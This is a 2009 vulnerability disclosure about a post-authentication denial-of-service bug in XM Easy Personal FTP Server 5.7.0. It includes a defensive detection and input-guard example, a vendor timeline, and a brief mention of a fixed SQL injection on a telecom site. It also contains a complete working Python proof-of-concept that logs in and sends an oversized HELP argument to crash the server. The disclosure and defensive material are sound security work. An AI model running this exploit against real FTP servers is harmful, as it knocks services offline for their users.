Category: Disclosures

XM Easy Personal FTP Server Multiple DoS vulnerabilities

Author: Neeraj Thakar

Link to the author’s post:

http://hypersecurity.blogspot.com/2009/06/xm-personal-ftp-server-vulnerability.html

BID: http://www.securityfocus.com/bid/35239

Credits:
NeerajT of Nevis Labs
http://www.nevisnetworks.com/services.php?id=10

Date of Discovery: 14-May-2009

Vendor: Dxmsoft
URL: http://www.dxm2008.com/

Affected:
XM Easy Personal FTP Server 5.7.0
Earlier versions may also be affected

Overview:
XM Easy Personal FTP Server is an easy-to-use FTP server application. Multiple denial of service vulnerabilities exist in XM Easy Personal FTP Server that cause the application to crash when an overly long argument is sent to certain FTP commands after authentication.

Details:
The DoS vulnerability exists because the application fails to handle large parameter values sent to certain FTP commands such as HELP or TYPE. When a long value (> 4700 bytes) is passed as the argument to one of these commands, the FTP server cannot process it and crashes. Note that this is a post-authentication vulnerability: the user must be logged in (any valid account, anonymous included if the server allows it) to trigger the crash. No registers are overwritten, so remote code execution does not appear to be possible.
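The two things a practitioner wants from the description above are a way to spot the attack on the wire and a way a server should have read the command line in the first place. The following Python is an added example, not code from the advisory or from Dxmsoft: scan_transcript() walks a control-channel transcript, tracks login state from the server's 230 reply, and flags HELP/TYPE commands whose argument exceeds the 4700-byte threshold the advisory quotes; bounded_command_line() is the server-side guard the vendor's code evidently lacks, refusing any command line that has no CRLF within a fixed limit before it is ever parsed. The transcript, the 512-byte line limit and the reply wording are constructed for illustration.

```python
# Constructed FTP control-channel transcript, not a capture from the advisory.
# "C:" lines are client commands, "S:" lines are server replies.
SAMPLE_TRANSCRIPT = [
    "S: 220 XM Easy Personal FTP Server ready",
    "C: USER test",
    "S: 331 Password required for test",
    "C: PASS test",
    "S: 230 User test logged in",
    "C: TYPE I",
    "S: 200 Type set to I",
    "C: HELP " + "A" * 5000,          # oversized argument, sent post-auth
]

MAX_ARG_LEN = 4700                    # threshold stated in the advisory
WATCHED_COMMANDS = {"HELP", "TYPE"}   # commands the advisory names


def scan_transcript(lines, max_arg_len=MAX_ARG_LEN, watched=WATCHED_COMMANDS):
    """Detection side: return (line_no, command, arg_len, authenticated) for
    every client command in `watched` whose argument exceeds max_arg_len.
    Authentication state is derived from the server's 230 reply, so a hit
    with authenticated=True matches the post-auth condition in the advisory."""
    authenticated = False
    hits = []
    for line_no, raw in enumerate(lines, 1):
        if raw.startswith("S: "):
            if raw[3:].startswith("230"):
                authenticated = True
            continue
        if not raw.startswith("C: "):
            continue
        cmd, _, arg = raw[3:].partition(" ")
        cmd = cmd.upper()
        if cmd in watched and len(arg) > max_arg_len:
            hits.append((line_no, cmd, len(arg), authenticated))
    return hits


def bounded_command_line(buf, max_line=512):
    """Server-side guard (assumed limit of 512 bytes): pull one CRLF-terminated
    command line out of the receive buffer, refusing any line that has no CRLF
    inside max_line bytes. Returns (status, line, rest) with status "ok",
    "partial" (need more bytes) or "too-long" (reply 500 and discard)."""
    end = buf.find(b"\r\n", 0, max_line + 2)   # CRLF must begin by max_line
    if end == -1:
        if len(buf) > max_line:
            return "too-long", None, b""
        return "partial", None, buf
    return "ok", buf[:end], buf[end + 2:]


if __name__ == "__main__":
    for hit in scan_transcript(SAMPLE_TRANSCRIPT):
        print("line %d: %s with %d-byte argument (authenticated=%s)" % hit)
    print(bounded_command_line(b"TYPE I\r\n"))
    print(bounded_command_line(b"HELP " + b"A" * 5000 + b"\r\n")[0])
```

The scanner keys on the server's 230 reply rather than on seeing a PASS command, because a rejected login (530) leaves the session unauthenticated and such traffic would not reach the vulnerable code path. The guard checks for a line terminator inside a fixed window before any parsing happens, which is the check that turns a crash into a harmless 500 reply.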

Severity:
High

Solution:
No patches available from vendor
No workaround is available at this time

Vendor Communication Timelines:
05.14.2009 – Vulnerability Discovered
05.15.2009 – Vendor Notified
05.20.2009 – No Response, Vendor Notified again
06.05.2009 – No Ack from Vendor, Public Disclosure

PoC: Python Exploit
—————————————————–
#!/usr/bin/env python3
#
# ::::::::::::::::::::::::::::::[neeraj(.)thakar(at)nevisnetworks(.)com]
#
# [-] What:....[ XM Easy Personal FTP Server 5.7.0 ].....
# [-] Where:...[ http://www.dxm2008.com ].................
# [-] When:....[ 14-May-2009 ]...........................
# [-] Who:.....[ NeerajT | neeraj(.)thakar(at)nevisnetworks(.)com ]....
# [-] How:.....[
#   A Denial of service vulnerability exists in XM
#   Personal FTP Server that causes the application to
#   crash when a long list of arguments is sent to
#   certain FTP commands post authentication..........]
# [-] Thankz:..[ Jambalaya, Xin and Chintan ]............

import sys
from ftplib import FTP, all_errors


def usage():
    print("[...XM Personal FTP Server 5.7.0 DoS Exploit...]")
    print("[.........neeraj(.)thakar(at)gmail(.)com..............]\n")
    print("Usage: ./XMPersonal_FTPServer_DoSPoC.py <server-ip> <username> <password>\n")
    print("\n Use it at your own risk ! This is just a PoC. I am not responsible "
          "for damages done by your crazy thinking.. :P\n")


# The Main function starts here..
if __name__ == "__main__":
    ftpport = 21

    # get the args.. (server, username and password are all required)
    if len(sys.argv) < 4:
        usage()
        sys.exit(1)
    ftpserver = sys.argv[1]
    user = sys.argv[2]
    passwd = sys.argv[3]

    print("Connecting to " + ftpserver + " using " + user + "....", end=" ")

    # Try opening a connection to the FTP server. The timeout has to be
    # passed to connect(); assigning F.timeout after connecting does nothing.
    F = FTP()
    try:
        F.connect(ftpserver, ftpport, timeout=3)
        print("Connected !")
    except all_errors:
        print("\nCould not connect to the Server :(\n")
        sys.exit(1)

    # Lets create the Buffer.. (anything over ~4700 bytes triggers the crash)
    crap = "A" * 5000

    # Creat'in da'bomb
    dabomb = "HELP " + crap

    input("Press Enter to login..")

    # Lets login (the crash only triggers post-authentication)
    try:
        F.login(user, passwd)
    except all_errors:
        print("Oops.. Looks like you forgot to create a login !!\n")
        F.quit()
        sys.exit(1)
    input("Target Locked, Press Enter to fire..")

    print("Sendin Da'Bomb..")
    try:
        F.sendcmd(dabomb)
    except all_errors:
        # The control connection drops when the server process dies.
        print("Target destroyed !! Mission successfull..!")

    print("Returning to base..")
    F.close()
    sys.exit(0)
—————————————————–

ideacellular.com SQL Injection Vulnerability

The corporate login option on the Idea Cellular website was vulnerable to SQL injection. It was reported to Idea Cellular staff on 17th March 2009 and fixed on 23rd March 2009. They had initially informed us that it would take them around 8 days to fix it; surprisingly, they fixed it in 7 :-D. Does it actually take that much time? :-P

For detailed information, download the PDF.